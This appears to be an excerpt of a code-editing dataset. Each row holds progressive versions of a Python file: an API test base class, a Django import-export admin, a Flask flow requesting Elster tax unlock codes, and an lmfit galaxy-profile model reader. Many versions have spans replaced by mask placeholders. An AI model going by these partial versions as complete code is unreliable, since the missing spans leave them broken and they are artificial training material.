linked to in the response header.
Return the response JSON.
"""
self.assertEqual(response.status_code, http.client.OK)
result = response.json()
url = response.links['schema']['url']
try:
schema = self.schemas[url]
except KeyError:
r = self.GET(url)
self.assertEqual(r.status_code, http.client.OK)
schema = r.json()
self.schemas[url] = schema
self.validate_schema(result, schema)
return result
def validate_schema(self, instance, schema):
"""Validate the JSON instance versus the given JSON schema."""
jsonschema.validate(instance=instance, schema=schema,
format_checker=jsonschema.draft7_format_checker)
| "Base class for tests."
import argparse
import http.client
import json
import os
import re
import sys
import unittest
import jsonschema
import requests
SCHEMA_LINK_RX = re.compile(r'<([^>])+>; rel="([^"]+)')
JSON_MIMETYPE = 'application/json'
DEFAULT_SETTINGS = {
'ROOT_URL': 'http://127.0.0.1:5002/api',
'USERNAME': None, # Needs to be set! Must have admin privileges.
'APIKEY': None # Needs to be set! For the above user.
}
# The actual settings to use.
SETTINGS = {}
def process_args(filepath=None):
"""Process command-line arguments for this test suite.
Reset the settings and read the given settings file.
Return the unused arguments.
"""
if filepath is None:
parser = argparse.ArgumentParser()
parser.add_argument('-S', '--settings', dest='settings',
metavar='FILE', default='settings.json',
help='Settings file')
parser.add_argument('unittest_args', nargs='*')
options, args = parser.parse_known_args()
filepath = options.settings
args = [sys.argv[0]] + args
else:
args = sys.argv
SETTINGS.update(DEFAULT_SETTINGS)
with open(filepath) as infile:
SETTINGS.update(json.load(infile))
assert SETTINGS['USERNAME']
assert SETTINGS['APIKEY']
return args
def run():
unittest.main(argv=process_args())
class Base(unittest.TestCase):
"Base class for Symbasis test cases."
def setUp(self):
self.schemas = {}
self.session = requests.Session()
self.session.headers.update({'x-apikey': SETTINGS['APIKEY']})
self.addCleanup(self.close_session)
def close_session(self):
self.session.close()
@property
def root(self):
"Return the API root data."
try:
return self._root
except AttributeError:
response = self.GET(SETTINGS['ROOT_URL'])
self.assertEqual(response.status_code, http.client.OK)
self._root = self.check_schema(response)
return self._root
def GET(self, url):
return self.session.get(url)
def POST(self, url, json=None):
return self.session.post(url, json=json)
def PUT(self, url):
return self.session.put(url)
def DELETE(self, url):
return self.session.delete(url)
def check_schema(self, response):
"""Check that the response JSON data matches the schema
linked to in the response header.
Return the response JSON.
"""
self.assertEqual(response.status_code, http.client.OK)
result = response.json()
url = response.links['schema']['url']
try:
schema = self.schemas[url]
except KeyError:
r = self.GET(url)
self.assertEqual(r.status_code, http.client.OK)
schema = r.json()
self.schemas[url] = schema
self.validate_schema(result, schema)
return result
def validate_schema(self, instance, schema):
"Validate the JSON instance versus the given JSON schema."
jsonschema.validate(instance=instance,
schema=schema,
format_checker=jsonschema.draft7_format_checker)
| [
8,
12,
13,
14,
16
] |
647 | 630480e9458491a26ea9060bd36541a0d5805a11 | <mask token>
| <mask token>
def kind():
data = {}
with open('dataset.json', 'r') as read_file:
data = json.load(read_file)
return data['kind']
<mask token>
| <mask token>
def kind():
data = {}
with open('dataset.json', 'r') as read_file:
data = json.load(read_file)
return data['kind']
def items():
data = {}
with open('dataset.json', 'r') as read_file:
data = json.load(read_file)
return data['items']
| import urllib.request
import json
def kind():
data = {}
with open('dataset.json', 'r') as read_file:
data = json.load(read_file)
return data['kind']
def items():
data = {}
with open('dataset.json', 'r') as read_file:
data = json.load(read_file)
return data['items']
| import urllib.request
import json
def kind():
data={}
with open("dataset.json", "r") as read_file:
data = json.load(read_file)
return data["kind"]
def items():
data={}
with open("dataset.json", "r") as read_file:
data = json.load(read_file)
return data["items"]
#Can add a bunch of other things after refering to data
| [
0,
1,
2,
3,
4
] |
648 | 016b64a2eb4af3034d54272c878fb917506d330c | <mask token>
class DataResource(resources.ModelResource):
<mask token>
<mask token>
<mask token>
class Meta:
fields = 'groupname', 'system_name', 'I6000'
class DataAdmin(ImportExportMixin, admin.ModelAdmin):
list_display = ['groupname', 'system_name', 'I6000', 'xtjslx', 'bslx',
'ywbs', 'ywzrbs', 'yunxingzhuangtai', 'url', 'xtsxsj', 'xtxxsj',
'ip', 'xunijiqunip', 'date']
resources_class = DataResource
<mask token>
| <mask token>
class DataResource(resources.ModelResource):
groupname = fields.Field(widget=widgets.ForeignKeyWidget(Addgroup, 'name'))
system_name = fields.Field(column_name='system_name', attribute=
'system_name', widget=widgets.ForeignKeyWidget(Addsystemname, 'name'))
I6000 = fields.Field(column_name='I6000', attribute='I6000')
class Meta:
fields = 'groupname', 'system_name', 'I6000'
class DataAdmin(ImportExportMixin, admin.ModelAdmin):
list_display = ['groupname', 'system_name', 'I6000', 'xtjslx', 'bslx',
'ywbs', 'ywzrbs', 'yunxingzhuangtai', 'url', 'xtsxsj', 'xtxxsj',
'ip', 'xunijiqunip', 'date']
resources_class = DataResource
<mask token>
| <mask token>
class DataResource(resources.ModelResource):
groupname = fields.Field(widget=widgets.ForeignKeyWidget(Addgroup, 'name'))
system_name = fields.Field(column_name='system_name', attribute=
'system_name', widget=widgets.ForeignKeyWidget(Addsystemname, 'name'))
I6000 = fields.Field(column_name='I6000', attribute='I6000')
class Meta:
fields = 'groupname', 'system_name', 'I6000'
class DataAdmin(ImportExportMixin, admin.ModelAdmin):
list_display = ['groupname', 'system_name', 'I6000', 'xtjslx', 'bslx',
'ywbs', 'ywzrbs', 'yunxingzhuangtai', 'url', 'xtsxsj', 'xtxxsj',
'ip', 'xunijiqunip', 'date']
resources_class = DataResource
admin.site.register(Data, DataAdmin)
| from import_export.admin import ImportExportMixin
from django.contrib import admin
from import_export import resources, widgets, fields
from .models import Addgroup, Addsystemname, Zhuanzhebushi, Yewuzerenbumen, czyylx, Zhuanze, Data
from import_export import fields, resources
from import_export.widgets import ForeignKeyWidget
class DataResource(resources.ModelResource):
groupname = fields.Field(widget=widgets.ForeignKeyWidget(Addgroup, 'name'))
system_name = fields.Field(column_name='system_name', attribute=
'system_name', widget=widgets.ForeignKeyWidget(Addsystemname, 'name'))
I6000 = fields.Field(column_name='I6000', attribute='I6000')
class Meta:
fields = 'groupname', 'system_name', 'I6000'
class DataAdmin(ImportExportMixin, admin.ModelAdmin):
list_display = ['groupname', 'system_name', 'I6000', 'xtjslx', 'bslx',
'ywbs', 'ywzrbs', 'yunxingzhuangtai', 'url', 'xtsxsj', 'xtxxsj',
'ip', 'xunijiqunip', 'date']
resources_class = DataResource
admin.site.register(Data, DataAdmin)
| from import_export.admin import ImportExportMixin
from django.contrib import admin
from import_export import resources, widgets, fields
from .models import Addgroup,Addsystemname,Zhuanzhebushi,Yewuzerenbumen,czyylx,Zhuanze,Data
from import_export import fields, resources
from import_export.widgets import ForeignKeyWidget
# Register your models here.
class DataResource(resources.ModelResource):
groupname = fields.Field( widget=widgets.ForeignKeyWidget(Addgroup, 'name'))
system_name = fields.Field(column_name='system_name', attribute='system_name', widget=widgets.ForeignKeyWidget(Addsystemname, 'name'))
I6000 = fields.Field(column_name='I6000', attribute='I6000')
class Meta:
fields = ('groupname','system_name','I6000')
class DataAdmin(ImportExportMixin,admin.ModelAdmin):
list_display = ['groupname','system_name','I6000','xtjslx','bslx','ywbs','ywzrbs','yunxingzhuangtai','url','xtsxsj','xtxxsj','ip','xunijiqunip','date']
resources_class = DataResource
admin.site.register(Data,DataAdmin) | [
3,
4,
5,
6,
7
] |
649 | cddb16a305f74eb1a3f2854208f8508c4a7a8953 | <mask token>
class UnlockCodeRequestMultiStepFlow(MultiStepFlow):
<mask token>
def __init__(self, endpoint):
super(UnlockCodeRequestMultiStepFlow, self).__init__(title=_(
'form.auth-request.title'), steps=[UnlockCodeRequestInputStep,
UnlockCodeRequestFailureStep, UnlockCodeRequestSuccessStep],
endpoint=endpoint)
<mask token>
@staticmethod
def _register_user(request_form):
"""
This method requests an unlock code with Elster for not registered users. If successful
the users will be registered.
:param request_form: The form attribute of the request. It should contain an idnr and a dob element.
"""
idnr = request_form['idnr']
if user_exists(idnr):
raise UserAlreadyExistsError(idnr)
response = elster_client.send_unlock_code_request_with_elster(
request_form, request.remote_addr)
request_id = escape(response['elster_request_id'])
create_user(idnr, request_form['dob'].strftime('%d.%m.%Y'), request_id)
| <mask token>
class UnlockCodeRequestMultiStepFlow(MultiStepFlow):
<mask token>
def __init__(self, endpoint):
super(UnlockCodeRequestMultiStepFlow, self).__init__(title=_(
'form.auth-request.title'), steps=[UnlockCodeRequestInputStep,
UnlockCodeRequestFailureStep, UnlockCodeRequestSuccessStep],
endpoint=endpoint)
def _handle_specifics_for_step(self, step, render_info, stored_data):
render_info, stored_data = super(UnlockCodeRequestMultiStepFlow, self
)._handle_specifics_for_step(step, render_info, stored_data)
if isinstance(step, UnlockCodeRequestInputStep):
render_info.additional_info['next_button_label'] = _(
'form.register')
if request.method == 'POST' and render_info.form.validate():
create_audit_log_confirmation_entry(
'Confirmed registration data privacy', request.
remote_addr, stored_data['idnr'],
'registration_confirm_data_privacy', stored_data[
'registration_confirm_data_privacy'])
create_audit_log_confirmation_entry(
'Confirmed registration terms of service', request.
remote_addr, stored_data['idnr'],
'registration_confirm_terms_of_service', stored_data[
'registration_confirm_terms_of_service'])
create_audit_log_confirmation_entry(
'Confirmed registration incomes', request.remote_addr,
stored_data['idnr'], 'registration_confirm_incomes',
stored_data['registration_confirm_incomes'])
create_audit_log_confirmation_entry(
'Confirmed registration edata', request.remote_addr,
stored_data['idnr'], 'registration_confirm_e_data',
stored_data['registration_confirm_e_data'])
try:
self._register_user(stored_data)
render_info.next_url = self.url_for_step(
UnlockCodeRequestSuccessStep.name)
except (UserAlreadyExistsError, ElsterProcessNotSuccessful):
app.logger.info('Could not request unlock code for user',
exc_info=True)
pass
elif isinstance(step, UnlockCodeRequestFailureStep):
render_info.next_url = None
elif isinstance(step, UnlockCodeRequestSuccessStep):
render_info.prev_url = self.url_for_step(UnlockCodeRequestInputStep
.name)
return render_info, stored_data
@staticmethod
def _register_user(request_form):
"""
This method requests an unlock code with Elster for not registered users. If successful
the users will be registered.
:param request_form: The form attribute of the request. It should contain an idnr and a dob element.
"""
idnr = request_form['idnr']
if user_exists(idnr):
raise UserAlreadyExistsError(idnr)
response = elster_client.send_unlock_code_request_with_elster(
request_form, request.remote_addr)
request_id = escape(response['elster_request_id'])
create_user(idnr, request_form['dob'].strftime('%d.%m.%Y'), request_id)
| <mask token>
class UnlockCodeRequestMultiStepFlow(MultiStepFlow):
_DEBUG_DATA = UnlockCodeRequestInputStep, {'idnr': '04452397687', 'dob':
datetime.date(1985, 1, 1), 'registration_confirm_data_privacy':
True, 'registration_confirm_terms_of_service': True,
'registration_confirm_incomes': True, 'registration_confirm_e_data':
True}
def __init__(self, endpoint):
super(UnlockCodeRequestMultiStepFlow, self).__init__(title=_(
'form.auth-request.title'), steps=[UnlockCodeRequestInputStep,
UnlockCodeRequestFailureStep, UnlockCodeRequestSuccessStep],
endpoint=endpoint)
def _handle_specifics_for_step(self, step, render_info, stored_data):
render_info, stored_data = super(UnlockCodeRequestMultiStepFlow, self
)._handle_specifics_for_step(step, render_info, stored_data)
if isinstance(step, UnlockCodeRequestInputStep):
render_info.additional_info['next_button_label'] = _(
'form.register')
if request.method == 'POST' and render_info.form.validate():
create_audit_log_confirmation_entry(
'Confirmed registration data privacy', request.
remote_addr, stored_data['idnr'],
'registration_confirm_data_privacy', stored_data[
'registration_confirm_data_privacy'])
create_audit_log_confirmation_entry(
'Confirmed registration terms of service', request.
remote_addr, stored_data['idnr'],
'registration_confirm_terms_of_service', stored_data[
'registration_confirm_terms_of_service'])
create_audit_log_confirmation_entry(
'Confirmed registration incomes', request.remote_addr,
stored_data['idnr'], 'registration_confirm_incomes',
stored_data['registration_confirm_incomes'])
create_audit_log_confirmation_entry(
'Confirmed registration edata', request.remote_addr,
stored_data['idnr'], 'registration_confirm_e_data',
stored_data['registration_confirm_e_data'])
try:
self._register_user(stored_data)
render_info.next_url = self.url_for_step(
UnlockCodeRequestSuccessStep.name)
except (UserAlreadyExistsError, ElsterProcessNotSuccessful):
app.logger.info('Could not request unlock code for user',
exc_info=True)
pass
elif isinstance(step, UnlockCodeRequestFailureStep):
render_info.next_url = None
elif isinstance(step, UnlockCodeRequestSuccessStep):
render_info.prev_url = self.url_for_step(UnlockCodeRequestInputStep
.name)
return render_info, stored_data
@staticmethod
def _register_user(request_form):
"""
This method requests an unlock code with Elster for not registered users. If successful
the users will be registered.
:param request_form: The form attribute of the request. It should contain an idnr and a dob element.
"""
idnr = request_form['idnr']
if user_exists(idnr):
raise UserAlreadyExistsError(idnr)
response = elster_client.send_unlock_code_request_with_elster(
request_form, request.remote_addr)
request_id = escape(response['elster_request_id'])
create_user(idnr, request_form['dob'].strftime('%d.%m.%Y'), request_id)
| import datetime
from flask import request
from flask_babel import _
from markupsafe import escape
from app import app
from app.data_access.audit_log_controller import create_audit_log_confirmation_entry
from app.data_access.user_controller import user_exists, create_user
from app.data_access.user_controller_errors import UserAlreadyExistsError
from app.elster_client import elster_client
from app.elster_client.elster_errors import ElsterProcessNotSuccessful
from app.forms.flows.multistep_flow import MultiStepFlow
from app.forms.steps.unlock_code_request_steps import UnlockCodeRequestInputStep, UnlockCodeRequestSuccessStep, UnlockCodeRequestFailureStep
class UnlockCodeRequestMultiStepFlow(MultiStepFlow):
_DEBUG_DATA = UnlockCodeRequestInputStep, {'idnr': '04452397687', 'dob':
datetime.date(1985, 1, 1), 'registration_confirm_data_privacy':
True, 'registration_confirm_terms_of_service': True,
'registration_confirm_incomes': True, 'registration_confirm_e_data':
True}
def __init__(self, endpoint):
super(UnlockCodeRequestMultiStepFlow, self).__init__(title=_(
'form.auth-request.title'), steps=[UnlockCodeRequestInputStep,
UnlockCodeRequestFailureStep, UnlockCodeRequestSuccessStep],
endpoint=endpoint)
def _handle_specifics_for_step(self, step, render_info, stored_data):
render_info, stored_data = super(UnlockCodeRequestMultiStepFlow, self
)._handle_specifics_for_step(step, render_info, stored_data)
if isinstance(step, UnlockCodeRequestInputStep):
render_info.additional_info['next_button_label'] = _(
'form.register')
if request.method == 'POST' and render_info.form.validate():
create_audit_log_confirmation_entry(
'Confirmed registration data privacy', request.
remote_addr, stored_data['idnr'],
'registration_confirm_data_privacy', stored_data[
'registration_confirm_data_privacy'])
create_audit_log_confirmation_entry(
'Confirmed registration terms of service', request.
remote_addr, stored_data['idnr'],
'registration_confirm_terms_of_service', stored_data[
'registration_confirm_terms_of_service'])
create_audit_log_confirmation_entry(
'Confirmed registration incomes', request.remote_addr,
stored_data['idnr'], 'registration_confirm_incomes',
stored_data['registration_confirm_incomes'])
create_audit_log_confirmation_entry(
'Confirmed registration edata', request.remote_addr,
stored_data['idnr'], 'registration_confirm_e_data',
stored_data['registration_confirm_e_data'])
try:
self._register_user(stored_data)
render_info.next_url = self.url_for_step(
UnlockCodeRequestSuccessStep.name)
except (UserAlreadyExistsError, ElsterProcessNotSuccessful):
app.logger.info('Could not request unlock code for user',
exc_info=True)
pass
elif isinstance(step, UnlockCodeRequestFailureStep):
render_info.next_url = None
elif isinstance(step, UnlockCodeRequestSuccessStep):
render_info.prev_url = self.url_for_step(UnlockCodeRequestInputStep
.name)
return render_info, stored_data
@staticmethod
def _register_user(request_form):
"""
This method requests an unlock code with Elster for not registered users. If successful
the users will be registered.
:param request_form: The form attribute of the request. It should contain an idnr and a dob element.
"""
idnr = request_form['idnr']
if user_exists(idnr):
raise UserAlreadyExistsError(idnr)
response = elster_client.send_unlock_code_request_with_elster(
request_form, request.remote_addr)
request_id = escape(response['elster_request_id'])
create_user(idnr, request_form['dob'].strftime('%d.%m.%Y'), request_id)
| import datetime
from flask import request
from flask_babel import _
from markupsafe import escape
from app import app
from app.data_access.audit_log_controller import create_audit_log_confirmation_entry
from app.data_access.user_controller import user_exists, create_user
from app.data_access.user_controller_errors import UserAlreadyExistsError
from app.elster_client import elster_client
from app.elster_client.elster_errors import ElsterProcessNotSuccessful
from app.forms.flows.multistep_flow import MultiStepFlow
from app.forms.steps.unlock_code_request_steps import UnlockCodeRequestInputStep, UnlockCodeRequestSuccessStep, \
UnlockCodeRequestFailureStep
class UnlockCodeRequestMultiStepFlow(MultiStepFlow):
_DEBUG_DATA = (
UnlockCodeRequestInputStep,
{
'idnr': '04452397687',
'dob': datetime.date(1985, 1, 1),
'registration_confirm_data_privacy': True,
'registration_confirm_terms_of_service': True,
'registration_confirm_incomes': True,
'registration_confirm_e_data': True,
}
)
def __init__(self, endpoint):
super(UnlockCodeRequestMultiStepFlow, self).__init__(
title=_('form.auth-request.title'),
steps=[
UnlockCodeRequestInputStep,
UnlockCodeRequestFailureStep,
UnlockCodeRequestSuccessStep
],
endpoint=endpoint,
)
# TODO: Use inheritance to clean up this method
def _handle_specifics_for_step(self, step, render_info, stored_data):
render_info, stored_data = super(UnlockCodeRequestMultiStepFlow, self)._handle_specifics_for_step(step, render_info, stored_data)
if isinstance(step, UnlockCodeRequestInputStep):
render_info.additional_info['next_button_label'] = _('form.register')
if request.method == 'POST' and render_info.form.validate():
create_audit_log_confirmation_entry('Confirmed registration data privacy', request.remote_addr,
stored_data['idnr'], 'registration_confirm_data_privacy',
stored_data['registration_confirm_data_privacy'])
create_audit_log_confirmation_entry('Confirmed registration terms of service', request.remote_addr,
stored_data['idnr'], 'registration_confirm_terms_of_service',
stored_data['registration_confirm_terms_of_service'])
create_audit_log_confirmation_entry('Confirmed registration incomes', request.remote_addr,
stored_data['idnr'], 'registration_confirm_incomes',
stored_data['registration_confirm_incomes'])
create_audit_log_confirmation_entry('Confirmed registration edata', request.remote_addr,
stored_data['idnr'], 'registration_confirm_e_data',
stored_data['registration_confirm_e_data'])
try:
self._register_user(stored_data)
# prevent going to failure page as in normal flow
render_info.next_url = self.url_for_step(UnlockCodeRequestSuccessStep.name)
except (UserAlreadyExistsError, ElsterProcessNotSuccessful):
app.logger.info("Could not request unlock code for user", exc_info=True)
pass # go to failure step
elif isinstance(step, UnlockCodeRequestFailureStep):
render_info.next_url = None
elif isinstance(step, UnlockCodeRequestSuccessStep):
render_info.prev_url = self.url_for_step(UnlockCodeRequestInputStep.name)
return render_info, stored_data
@staticmethod
def _register_user(request_form):
"""
This method requests an unlock code with Elster for not registered users. If successful
the users will be registered.
:param request_form: The form attribute of the request. It should contain an idnr and a dob element.
"""
idnr = request_form['idnr']
if user_exists(idnr):
raise UserAlreadyExistsError(idnr)
response = elster_client.send_unlock_code_request_with_elster(request_form, request.remote_addr)
request_id = escape(response['elster_request_id'])
create_user(idnr, request_form['dob'].strftime("%d.%m.%Y"), request_id)
| [
3,
4,
5,
6,
7
] |
650 | 219b22b6ad685fc316b1df02cc924a1cfec89f5b | <mask token>
| <mask token>
def readInputModel(txt, equivalentAxisFit, Settings):
psfwing_02pxscale_datatab = None
psfwing_logscale_datatab = None
componentslist = []
params = Parameters()
data = open(txt)
for line in data:
if line[0] != '#':
comp = Component()
comp.number = int(line.split()[0])
comp.name = str(line.split()[1])
if comp.name == 'ferrer':
par1name = 'par1_' + str(line.split()[0])
par2name = 'par2_' + str(line.split()[0])
par3name = 'par3_' + str(line.split()[0])
par4name = 'par4_' + str(line.split()[0])
p1 = par1name, float(line.split()[2]), True, 0.01, None, None
if line.split()[3] == 'False':
p1 = par1name, float(line.split()[2]
), False, 0.01, None, None
p2 = par2name, float(line.split()[4]), True, None, 35.0, None
if line.split()[5] == 'False':
p2 = par2name, float(line.split()[4]
), False, None, 35.0, None
p3 = par3name, float(line.split()[6]), True, 0.01, 4.0, None
if line.split()[7] == 'False':
p3 = par3name, float(line.split()[6]
), False, 0.01, 4.0, None
p4 = par4name, float(line.split()[8]), True, 0.01, 1.999, None
if line.split()[9] == 'False':
p4 = par4name, float(line.split()[8]
), False, 0.01, 1.999, None
comp.parameters.add_many(p1, p2, p3, p4)
params.add_many(p1, p2, p3, p4)
componentslist.append(comp)
if comp.name == 'tsersic':
par1name = 'par1_' + str(line.split()[0])
par2name = 'par2_' + str(line.split()[0])
par3name = 'par3_' + str(line.split()[0])
par4name = 'par4_' + str(line.split()[0])
p1 = par1name, float(line.split()[2]), True, 0.01, None, None
if line.split()[3] == 'False':
p1 = par1name, float(line.split()[2]
), False, 0.01, None, None
p2 = par2name, float(line.split()[4]), True, None, 35.0, None
if line.split()[5] == 'False':
p2 = par2name, float(line.split()[4]
), False, None, 35.0, None
p3 = par3name, float(line.split()[6]), True, 0.01, 20.0, None
if line.split()[7] == 'False':
p3 = par3name, float(line.split()[6]
), False, 0.01, 20.0, None
p4 = par4name, float(line.split()[8]), True, 0.01, None, None
if line.split()[9] == 'False':
p4 = par4name, float(line.split()[8]
), False, 0.01, None, None
comp.parameters.add_many(p1, p2, p3, p4)
params.add_many(p1, p2, p3, p4)
componentslist.append(comp)
if comp.name == 'sersic':
par1name = 'par1_' + str(line.split()[0])
par2name = 'par2_' + str(line.split()[0])
par3name = 'par3_' + str(line.split()[0])
p1 = par1name, float(line.split()[2]), True, 0.01, None, None
if line.split()[3] == 'False':
p1 = par1name, float(line.split()[2]
), False, 0.01, None, None
p2 = par2name, float(line.split()[4]), True, None, 35.0, None
if line.split()[5] == 'False':
p2 = par2name, float(line.split()[4]
), False, None, 35.0, None
p3 = par3name, float(line.split()[6]), True, 0.01, 20.0, None
if line.split()[7] == 'False':
p3 = par3name, float(line.split()[6]
), False, 0.01, 20.0, None
comp.parameters.add_many(p1, p2, p3)
params.add_many(p1, p2, p3)
componentslist.append(comp)
if comp.name == 'tdisc' or comp.name == 'gring':
par1name = 'par1_' + str(line.split()[0])
par2name = 'par2_' + str(line.split()[0])
par3name = 'par3_' + str(line.split()[0])
p1 = par1name, float(line.split()[2]), True, 0.01, None, None
if line.split()[3] == 'False':
p1 = par1name, float(line.split()[2]
), False, 0.01, None, None
p2 = par2name, float(line.split()[4]), True, None, 35.0, None
if line.split()[5] == 'False':
p2 = par2name, float(line.split()[4]
), False, None, 35.0, None
p3 = par3name, float(line.split()[6]), True, 0.01, None, None
if line.split()[7] == 'False':
p3 = par3name, float(line.split()[6]
), False, 0.01, None, None
comp.parameters.add_many(p1, p2, p3)
params.add_many(p1, p2, p3)
componentslist.append(comp)
elif comp.name == 'gaussian' or comp.name == 'disc':
par1name = 'par1_' + str(line.split()[0])
par2name = 'par2_' + str(line.split()[0])
p1 = par1name, float(line.split()[2]), True, 0.01, None, None
if line.split()[3] == 'False':
p1 = par1name, float(line.split()[2]
), False, 0.01, None, None
p2 = par2name, float(line.split()[4]), True, None, 35.0, None
if line.split()[5] == 'False':
p2 = par2name, float(line.split()[4]
), False, None, 35.0, None
comp.parameters.add_many(p1, p2)
params.add_many(p1, p2)
componentslist.append(comp)
elif comp.name == 'psf' or comp.name == 'psfwing':
par2name = 'par2_' + str(line.split()[0])
p2 = par2name, float(line.split()[4]), True, None, 35.0, None
if line.split()[5] == 'False':
p2 = par2name, float(line.split()[4]
), False, None, 35.0, None
comp.parameters.add_many(p2)
params.add_many(p2)
componentslist.append(comp)
if comp.name == 'psfwing':
psfwing_02pxscale_datatab = readEllipseOutput(
'star_02pxscale.ell')
psfwing_02pxscale_datatab['sma'
] = psfwing_02pxscale_datatab['sma'
] * Settings.pxlToArcsec
if equivalentAxisFit:
psfwing_02pxscale_datatab['sma'
] = psfwing_02pxscale_datatab['sma'] * np.sqrt(
1 - psfwing_02pxscale_datatab['ellip'])
psfwing_02pxscale_datatab['intens'
] = psfwing_02pxscale_datatab['intens'
] / Settings.pxlToArcsec ** 2
psfwing_02pxscale_datatab['intens'
] = psfwing_02pxscale_datatab['intens'] / max(
psfwing_02pxscale_datatab['intens'])
psfwing_logscale_datatab = readEllipseOutput(
'star_logscale.ell')
psfwing_logscale_datatab['sma'] = psfwing_logscale_datatab[
'sma'] * Settings.pxlToArcsec
if equivalentAxisFit:
psfwing_logscale_datatab['sma'
] = psfwing_logscale_datatab['sma'] * np.sqrt(1 -
psfwing_logscale_datatab['ellip'])
psfwing_logscale_datatab['intens'
] = psfwing_logscale_datatab['intens'
] / Settings.pxlToArcsec ** 2
psfwing_logscale_datatab['intens'
] = psfwing_logscale_datatab['intens'] / max(
psfwing_logscale_datatab['intens'])
return (componentslist, params, psfwing_02pxscale_datatab,
psfwing_logscale_datatab)
| from lmfit import Parameters
import numpy as np
from cls.cls import *
from reading.ellipseOutput import readEllipseOutput
def readInputModel(txt, equivalentAxisFit, Settings):
psfwing_02pxscale_datatab = None
psfwing_logscale_datatab = None
componentslist = []
params = Parameters()
data = open(txt)
for line in data:
if line[0] != '#':
comp = Component()
comp.number = int(line.split()[0])
comp.name = str(line.split()[1])
if comp.name == 'ferrer':
par1name = 'par1_' + str(line.split()[0])
par2name = 'par2_' + str(line.split()[0])
par3name = 'par3_' + str(line.split()[0])
par4name = 'par4_' + str(line.split()[0])
p1 = par1name, float(line.split()[2]), True, 0.01, None, None
if line.split()[3] == 'False':
p1 = par1name, float(line.split()[2]
), False, 0.01, None, None
p2 = par2name, float(line.split()[4]), True, None, 35.0, None
if line.split()[5] == 'False':
p2 = par2name, float(line.split()[4]
), False, None, 35.0, None
p3 = par3name, float(line.split()[6]), True, 0.01, 4.0, None
if line.split()[7] == 'False':
p3 = par3name, float(line.split()[6]
), False, 0.01, 4.0, None
p4 = par4name, float(line.split()[8]), True, 0.01, 1.999, None
if line.split()[9] == 'False':
p4 = par4name, float(line.split()[8]
), False, 0.01, 1.999, None
comp.parameters.add_many(p1, p2, p3, p4)
params.add_many(p1, p2, p3, p4)
componentslist.append(comp)
if comp.name == 'tsersic':
par1name = 'par1_' + str(line.split()[0])
par2name = 'par2_' + str(line.split()[0])
par3name = 'par3_' + str(line.split()[0])
par4name = 'par4_' + str(line.split()[0])
p1 = par1name, float(line.split()[2]), True, 0.01, None, None
if line.split()[3] == 'False':
p1 = par1name, float(line.split()[2]
), False, 0.01, None, None
p2 = par2name, float(line.split()[4]), True, None, 35.0, None
if line.split()[5] == 'False':
p2 = par2name, float(line.split()[4]
), False, None, 35.0, None
p3 = par3name, float(line.split()[6]), True, 0.01, 20.0, None
if line.split()[7] == 'False':
p3 = par3name, float(line.split()[6]
), False, 0.01, 20.0, None
p4 = par4name, float(line.split()[8]), True, 0.01, None, None
if line.split()[9] == 'False':
p4 = par4name, float(line.split()[8]
), False, 0.01, None, None
comp.parameters.add_many(p1, p2, p3, p4)
params.add_many(p1, p2, p3, p4)
componentslist.append(comp)
if comp.name == 'sersic':
par1name = 'par1_' + str(line.split()[0])
par2name = 'par2_' + str(line.split()[0])
par3name = 'par3_' + str(line.split()[0])
p1 = par1name, float(line.split()[2]), True, 0.01, None, None
if line.split()[3] == 'False':
p1 = par1name, float(line.split()[2]
), False, 0.01, None, None
p2 = par2name, float(line.split()[4]), True, None, 35.0, None
if line.split()[5] == 'False':
p2 = par2name, float(line.split()[4]
), False, None, 35.0, None
p3 = par3name, float(line.split()[6]), True, 0.01, 20.0, None
if line.split()[7] == 'False':
p3 = par3name, float(line.split()[6]
), False, 0.01, 20.0, None
comp.parameters.add_many(p1, p2, p3)
params.add_many(p1, p2, p3)
componentslist.append(comp)
if comp.name == 'tdisc' or comp.name == 'gring':
par1name = 'par1_' + str(line.split()[0])
par2name = 'par2_' + str(line.split()[0])
par3name = 'par3_' + str(line.split()[0])
p1 = par1name, float(line.split()[2]), True, 0.01, None, None
if line.split()[3] == 'False':
p1 = par1name, float(line.split()[2]
), False, 0.01, None, None
p2 = par2name, float(line.split()[4]), True, None, 35.0, None
if line.split()[5] == 'False':
p2 = par2name, float(line.split()[4]
), False, None, 35.0, None
p3 = par3name, float(line.split()[6]), True, 0.01, None, None
if line.split()[7] == 'False':
p3 = par3name, float(line.split()[6]
), False, 0.01, None, None
comp.parameters.add_many(p1, p2, p3)
params.add_many(p1, p2, p3)
componentslist.append(comp)
elif comp.name == 'gaussian' or comp.name == 'disc':
par1name = 'par1_' + str(line.split()[0])
par2name = 'par2_' + str(line.split()[0])
p1 = par1name, float(line.split()[2]), True, 0.01, None, None
if line.split()[3] == 'False':
p1 = par1name, float(line.split()[2]
), False, 0.01, None, None
p2 = par2name, float(line.split()[4]), True, None, 35.0, None
if line.split()[5] == 'False':
p2 = par2name, float(line.split()[4]
), False, None, 35.0, None
comp.parameters.add_many(p1, p2)
params.add_many(p1, p2)
componentslist.append(comp)
elif comp.name == 'psf' or comp.name == 'psfwing':
par2name = 'par2_' + str(line.split()[0])
p2 = par2name, float(line.split()[4]), True, None, 35.0, None
if line.split()[5] == 'False':
p2 = par2name, float(line.split()[4]
), False, None, 35.0, None
comp.parameters.add_many(p2)
params.add_many(p2)
componentslist.append(comp)
if comp.name == 'psfwing':
psfwing_02pxscale_datatab = readEllipseOutput(
'star_02pxscale.ell')
psfwing_02pxscale_datatab['sma'
] = psfwing_02pxscale_datatab['sma'
] * Settings.pxlToArcsec
if equivalentAxisFit:
psfwing_02pxscale_datatab['sma'
] = psfwing_02pxscale_datatab['sma'] * np.sqrt(
1 - psfwing_02pxscale_datatab['ellip'])
psfwing_02pxscale_datatab['intens'
] = psfwing_02pxscale_datatab['intens'
] / Settings.pxlToArcsec ** 2
psfwing_02pxscale_datatab['intens'
] = psfwing_02pxscale_datatab['intens'] / max(
psfwing_02pxscale_datatab['intens'])
psfwing_logscale_datatab = readEllipseOutput(
'star_logscale.ell')
psfwing_logscale_datatab['sma'] = psfwing_logscale_datatab[
'sma'] * Settings.pxlToArcsec
if equivalentAxisFit:
psfwing_logscale_datatab['sma'
] = psfwing_logscale_datatab['sma'] * np.sqrt(1 -
psfwing_logscale_datatab['ellip'])
psfwing_logscale_datatab['intens'
] = psfwing_logscale_datatab['intens'
] / Settings.pxlToArcsec ** 2
psfwing_logscale_datatab['intens'
] = psfwing_logscale_datatab['intens'] / max(
psfwing_logscale_datatab['intens'])
return (componentslist, params, psfwing_02pxscale_datatab,
psfwing_logscale_datatab)
| from lmfit import Parameters
import numpy as np
from cls.cls import *
